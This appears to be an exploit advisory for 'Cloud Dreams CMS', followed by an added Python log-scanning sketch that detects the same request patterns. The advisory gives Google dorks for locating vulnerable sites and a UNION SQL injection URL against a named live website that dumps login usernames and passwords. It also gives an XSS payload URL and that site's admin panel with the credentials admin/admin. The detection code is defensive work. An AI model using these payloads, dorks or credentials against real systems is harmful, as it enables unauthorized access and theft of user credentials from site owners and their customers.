# Exploit Title: Cloud Dreams CMS - SQL Injection + XSS + Weak Admin Password Vulnerability
# Google Dork 1: intext:" Web Design Company - Clouddreams " inurl:.php?id=
# Google Dork 2: intext:" Developed By Cloud Dreams"
# Date: 2018-01-30
# Exploit Author: The Shadow Walkers
# Discovered By: Astra (motawari@tutanota.com)
# Vendor Homepage: http://clouddreams.in/
# Software Link: -
# Version: 1.0
# Tested on: Kali Linux
# CVE : -
---------------------------------------------------------
SQL injection:
http://www.uniqlinens.in/details.php?proid=76[SQLi]
http://www.uniqlinens.in/details.php?proid=-76%27+Union+SeleCT+1,Group_ConCat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+From+login--+
-
XSS:
http://www.uniqlinens.in/index.php?msg=%3Cscript%3Ealert(/Astra/)%3C/script%3E&type=error
-
Admin Weak Password:
http://www.uniqlinens.in/admin
user:admin
password:admin
-------------------------------------------------------------------
# Astra - Ghostman - N37iD
# https://t.me/TheShadowWalkers
# Iranian Underground Researchers
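
Detection sketch for the two request patterns listed above (a non-integer `proid` on details.php and markup in `msg` on index.php), added here as an example and not part of the original advisory or the vendor's code. The log format, sample lines, finding names and the assumption that `proid` is always a plain integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (client addresses are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 "GET /details.php?proid=76 HTTP/1.1" 200',
    '203.0.113.9 "GET /details.php?proid=-76%27+Union+SeleCT+1,2+From+login--+ HTTP/1.1" 200',
    '203.0.113.9 "GET /index.php?msg=%3Cscript%3Ealert(1)%3C/script%3E&type=error HTTP/1.1" 200',
    '198.51.100.7 "GET /index.php?msg=Saved+successfully&type=ok HTTP/1.1" 200',
    '198.51.100.7 "POST /admin/login.php HTTP/1.1" 302',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters and tokens that have no business in a status message parameter.
MARKUP_RE = re.compile(r'[<>]|javascript:|\bon\w+\s*=', re.IGNORECASE)


def classify(target):
    """Return the list of findings for one request target (path plus query)."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # URL-decodes
    findings = []
    for value in params.get("proid", []):
        # Assumption: a legitimate product id is a short non-negative integer.
        if not re.fullmatch(r"\d{1,10}", value):
            findings.append("proid-not-integer")
    for value in params.get("msg", []):
        if MARKUP_RE.search(value):
            findings.append("msg-contains-markup")
    return findings


def scan(lines):
    """Return (client, target, findings) for every log line with findings."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = classify(match.group(1))
        if findings:
            hits.append((line.split()[0], match.group(1), findings))
    return hits


if __name__ == "__main__":
    for client, target, findings in scan(SAMPLE_LOG):
        print(client, ",".join(findings), target)
```

The same allow-list checks (integer-only `proid`, no markup in `msg`) belong in the application itself, alongside parameterized queries and output encoding; the log scan only shows whether such requests have already been made.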